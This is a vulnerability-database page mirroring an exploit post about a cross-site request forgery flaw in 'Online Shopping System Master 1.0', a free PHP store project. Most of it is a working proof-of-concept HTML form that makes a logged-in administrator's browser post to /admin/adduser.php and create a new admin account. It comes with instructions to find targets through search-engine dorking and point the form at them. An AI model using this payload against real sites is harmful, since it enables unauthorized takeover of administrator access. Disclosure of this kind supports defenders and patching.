Lucene search
K

Online Shopping System Master 1.0 Cross Site Request Forgery

🗓️ 22 Aug 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 225 Views

Online Shopping System Master 1.0 CSRF Vulnerability, allows creation of new admin through malicious HTML cod

Code
`=============================================================================================================================================  
| # Title : online shopping system master v1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 7.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /admin/adduser.php.  
  
[+] save code as poc.html .  
  
<div class="card">  
<div class="card-header card-header-primary">  
<h4 class="card-title">Add Users</h4>  
<p class="card-category">Complete User profile</p>  
</div>  
<div class="card-body">  
<form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
<div class="row">  
  
</div>  
</div>  
</div>  
<div class="row">  
<div class="col-md-6">  
<div class="form-group bmd-form-group">  
<label class="bmd-label-floating">Email</label>  
<input type="email" name="email" id="email" class="form-control" required="">  
</div>  
</div>  
<div class="col-md-6">  
<div class="form-group bmd-form-group">  
<label class="bmd-label-floating">Password</label>  
<input type="password" id="password" name="password" class="form-control" required="">  
</div>  
</div>  
  
<button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
<div class="clearfix"></div>  
</form>  
</div>  
</div>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation